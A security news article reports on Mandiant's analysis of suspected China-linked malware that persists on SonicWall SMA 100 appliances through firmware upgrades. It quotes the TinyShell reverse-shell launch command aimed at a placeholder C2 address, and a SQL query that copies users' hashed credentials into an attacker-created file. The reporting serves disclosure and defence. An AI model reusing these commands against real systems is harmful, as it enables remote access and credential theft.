Malware targets SonicWall SMA 100 Series appliances
Mandiant researchers have discovered a malware campaign that targets SonicWall SMA 100 Series appliances and is thought to have originated in China.
The malware was most likely introduced in 2021 and has proven to be extremely resilient, withstanding firmware upgrades. Its primary goal is to steal user credentials and grant the attacker high-privileged access via a variant of the TinyShell python command shell.
The malware is made up of a series of bash scripts and a single TinyShell variant ELF binary. The overall behavior of the malicious bash script suite demonstrates a thorough understanding of the appliance and is well tailored to the system in order to provide stability and persistence.
The SMA 100 Series is an access control system that allows remote users to log in to company resources through a single-sign-on (SSO) web portal, and intercepting user credentials would provide the attacker with an advantage in gaining sensitive information.
The main malware entry point is a bash script called firewalld, which runs its main loop once for the square of the number of files on the system: … …for j in $(ls / -R) do for i in $(ls / -R) do:… The script is in charge of executing a SQL command to steal credentials and executing the other components.
The firewalld initial function launches the TinyShell backdoor httpsd with the command “nohup /bin/httpsd -cC2 IP ADDRESS> -d 5 -m -1 -p 51432 > /dev/null 2>&1 &” if the httpsd process is not already running. This instructs TinyShell to run in reverse-shell mode and to contact the specified IP address and port at the time and day specified by the -m flag, with the beacon interval determined by the -d flag. If no IP address is provided, the binary contains a hardcoded IP address that is used for reverse-shell mode. It can also be used in listening bind shell mode.
The malware’s primary goal appears to be to steal hashed credentials from all logged in users. In firewalld, it accomplishes this by routinely running the SQL command select userName,password from Sessions against the sqlite3 database /tmp/temp.db and copying the results to the attacker-created text file /tmp/syslog.db. The appliance tracks session information, including hashed credentials, in the source database /tmp/temp.db. The hashes could be cracked offline once the attacker obtains them.
The researchers worked with SonicWall’s Product Security and Incident Response Team (PSIRT) to analyze an infected device and discovered that the attackers worked hard to make their tool stable and persistent. Every ten seconds, the malware checks for firmware upgrades and injects itself into the upgrade to continue harvesting credentials after the upgrade.
The sources for this piece include an article in Malwarebytes.